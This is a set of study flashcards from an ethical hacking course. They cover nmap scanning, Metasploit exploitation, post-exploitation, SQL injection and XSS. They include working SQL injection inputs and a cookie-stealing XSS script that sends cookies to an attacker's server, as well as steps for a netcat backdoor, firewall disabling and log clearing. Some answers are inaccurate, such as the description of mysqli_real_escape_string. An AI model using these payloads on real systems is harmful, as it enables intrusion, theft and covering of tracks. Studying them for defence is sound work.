Ethical Hacking

Question 1

List the 5 phases of ethical hacking

Answer 1

Reconnaisance
Scanning
Exploitation
Post Exploitation
Report Writing

Question 2

List the google search string terms

Answer 2

intitle
intext
inurl
filetype
site

Question 3

what is the nslookup command to change server?

Answer 3

server 8.8.8.8

Question 4

What is the nslookup command to find the authoritative DNS server for a domain

Answer 4

set type=ns
westernsydney.edu.au

Question 5

What are the types of hacking?

Answer 5

White hat: Non malicious attacks with full consent, done for security purposes, also known as ethical hacking

Grey hat hacking: Non malicious attacks done without permission

Black hat hacking: Done for malicious purpose

Question 6

What can scanning find?

Answer 6

If a host is alive
What ports are open
What processes are running on the host
What vulnerabilities exist

Question 7

What is nmap’s default scan behaviour?

Answer 7

nmap only scans the 1000 most common TCP ports by default. Sends TCP SYN, ACK and ICMP echo requests

Question 8

What does nmap do in order?

Answer 8

Host discovery, port scanning, service and OS detection

Question 9

What is the nmap command to help?

Answer 9

nmap -h

Question 10

What is the nmap command context for the top ports

Answer 10

sudo nmap [-s* for type of ports] –top-ports [number of ports] [ip address]

Question 11

What is the nmap command for scanning ports with
1. SYN packets
2. TCP connections
3. ACK packets
4. UDP

Answer 11

sudo nmap -s* [ip address]
*S for SYN
T for TCP
A for ACK
U for UDP

Question 12

What is the nmap command syntax to specify a port scan, and what is it for a range of ports?

Answer 12

sudo nmap -p [port number][ip address]
Ranges are [20-28,80,100]

Question 13

What is the nmap service detection command

Answer 13

sudo nmap -sV [ip address]
sudo nmap -sUV [ip address] for UDP ports

Question 14

What is the nmap OS detection command

Answer 14

sudo nmap -O [ip address]

Question 15

Name the vuln database used with our exploits (MS010 etc)

Answer 15

MS Security Bulletin

Question 16

Name three vuln scanners

Answer 16

GVM
Nessus
Nmap

Question 17

What is the command to start GVM, and to access it?

Answer 17

‘sudo gvm-start’
It is accessed with http://localhost:9392 or http://localhost:80

Question 18

What is the exploitation tool we use, and what is the command to start it on Kali Linux

Answer 18

MSF or Metasploit Framework.
It is accessed with the command msfconsole

Question 19

What are the steps to exploit a system with MSF

Answer 19

msfconsole to enter it
search vuln
use exploit from the results
set payload
show options and set options
exploit

Question 20

What is searchsploit, the syntax and some options

Answer 20

A local kali database to search exploits:
searchsploit [options] [terms]
-c is case sensitive
-p is full path

Question 21

How are exploits organised in msfconsole?

Answer 21

By OS

Question 22

What are the three payload categories?

Answer 22

Singles (function alone), Stagers(uploads a stage into victim’s memory) and Stages(payload needs loaded into memory)

Question 23

What are the two types of payload stagers?

Answer 23

Bind - host connects to the target
Reverse - Sets a TCP connection from target to host

Question 24

What are the commands to list the sessions and access them on msfconsole?

Answer 24

sessions
sessions -i (id)

Question 25

What does DLL stand for

Answer 25

Dynamic Link Library

Question 26

What does DLL do?

Answer 26

Forces another process to upload and run a payload on the host system
DLL injection is injecting a payload into a process to run it on the system

Question 27

What is the command to use nmap to detect vulns?

Answer 27

sudo nmap [script name] [port number] [target ip address]

Question 28

List a few meterpreter shell commands

Answer 28

cd, mkdir, rm, pwd, ls

Question 29

What is the command to send a session to the background?

Answer 29

background

Question 30

What is the command to hide a process?

Answer 30

getpid
ps -S [explorer]
migrate [target pid]

Question 31

What can vncinject do?

Answer 31

It injects a VNC server into a process on the target. If viewonly is set to true, you can view the desktop in real time, and if false, you have control to the desktop in real time

Question 32

List netcat’s functions

Answer 32

Banner grabbing
Establishing a raw data connection
Transferring files
Scanning ports
Shells

Question 33

What is the syntax for a netcat raw connection?

Answer 33

sudo nc [ip] [port]

Question 34

What is the command to run netcat on server mode? Explain what the options are.

Answer 34

sudo nc -vlp [port]
-l listens to ports
-v displays diagnostic messages
-p defines the port

Question 35

Write the file transfer commands for netcat through server mode

Answer 35

nc -vlp 2222 < openme.pdf
nc [ip] 2222 > openme.pdf

Question 36

What is client side exploitation?

Answer 36

Exploiting vulns on client’s systems and software i.e browsers, email clients etc.

Question 37

What is the payload option to create a malicious url to send to the client?

Answer 37

set srvport to listen on, set URIPATH, and set allowprompt to true

Question 38

What is the meterpreter options to allow migration of processes

Answer 38

set prependmigrate true
set prependmigrate proc [process name]

Question 39

What are the options to create a hostile pdf

Answer 39

exename (name of process)
filename [name]

Question 40

Command to create a meterpreter handler to recieve the connection

Answer 40

use exploit/multi/handler

Question 41

List some tasks of post exploitation

Answer 41

Privilege escalation
Creating backdoors
Information gathering
Installing rootkits

Question 42

What are the two methods of privilege escalation?

Answer 42

‘getsystem’ and local exploits

Question 43

How are local exploits used to escalate privilege?

Answer 43

Local exploits are run on the target once access is gained. The current session is backgrounded and a local exploit is used. The target is set. The session with the access and LPORT are set, then ‘exploit’ed

Question 44

Name the commands for system info gathering

Answer 44

sysinfo
hashdump
idletime

Question 45

Where are system logs stored in Linux, and where in Windows

Answer 45

/var/log
Event viewer

Question 46

What two logs does Windows viewer get?

Answer 46

Windows logs, application and service logs

Question 47

What command is used to delete all logs in Windows

Answer 47

clearev

Question 48

What is a rootkit?

Answer 48

An application that gains unauthorised access to computers and can hide its or other processes’ existence - hides processes or files

Question 49

List the three ‘reg’ commands

Answer 49

query, add, delete

Question 50

What is the command to turn firewalls off?

Answer 50

netsh advfirewall set allprofiles off

Question 51

What is the command to show firewall rules?

Answer 51

netsh advfirewall firewall show rule name=[“rule”] or all

Question 52

What are the steps to install an nc backdoor?

Answer 52

Upload nc.exe to target
Add nc.exe to automatic startup, set port number to listen on
Allow netcat in windows firewall by adding a rule inbound allowing tcp port

Question 53

What is the crafted input to display all user records?

Answer 53

’ or ‘0’=’0

Question 54

What is the crafted input to display database server version

Answer 54

’ union select null, version() #

Question 55

What is the crafted input to display username for DB access

Answer 55

’ union select null, user() #

Question 56

Crafted input to display database name?

Answer 56

’ union select null, database()

Question 57

Input to display table name

Answer 57

’ union select null, table_name
from information_schema.tables where table_name like
‘user%’ #

Question 58

What does mysqli_real_escape_string() function do

Answer 58

Bypasses ‘ and ‘’

Question 59

What are the two commands used to set proper SQLI security?

Answer 59

stripslashes()
mysqli_real_escape_string()

Question 60

What is a cookie?

Answer 60

A string from the website to a user’s browser that is stored as a unique id for the session

Question 61

What is the syntax to create a cookie?

Answer 61

Set-Cookie: [name]=[value] [; attributes]

Question 62

What are the cookie attributes?

Answer 62

Expires
Secure
HTTPOnly
Domain
Path

Question 63

What is an XSS Attack?

Answer 63

Using vulnerable websites to send malicious codes to clients

Question 64

What is the script to generate an alert box?

Answer 64

<script>
alert("THIS IS THEFT"); <script>
</script>

Question 65

What is the script to steal cookies over XSS? (Starting a server in Kali and the script command)

Answer 65

Starting a server: sudo python3 -m http.server 80

<script>
new Image().src="http://[ipaddr]/a.gif?" +document.cookie
</script>

Question 66

What is the difference between persistent and non persistent XSS attacks?

Answer 66

Persistent attacks store the JS code in the database, whereas non persistent or reflected attacks do not

Question 67

What is ZAP and what does it do?

Answer 67

OWASP Zed attack proxy intercepts HTML request and response messages

Question 68

How does Reflected XSS work?

Answer 68

A hacker sends a URL with a query string with malicious JS code, which is echoed as web content by a vulnerable site and executed in target computers

Question 69

What is the $_SERVER[“PHP_SELF”] variable?

Answer 69

It stores the full path of the php file currently executed by the web server

Question 70

What are the two guidelines of XSS Defence?

Answer 70

Protect cookies and sanitize user inputs

Question 71

What are the methods to sanitise user inputs?

Answer 71

htmlspecialchars() - removes the syntax of special characters in user input
test_input()
Using the HTML purifier library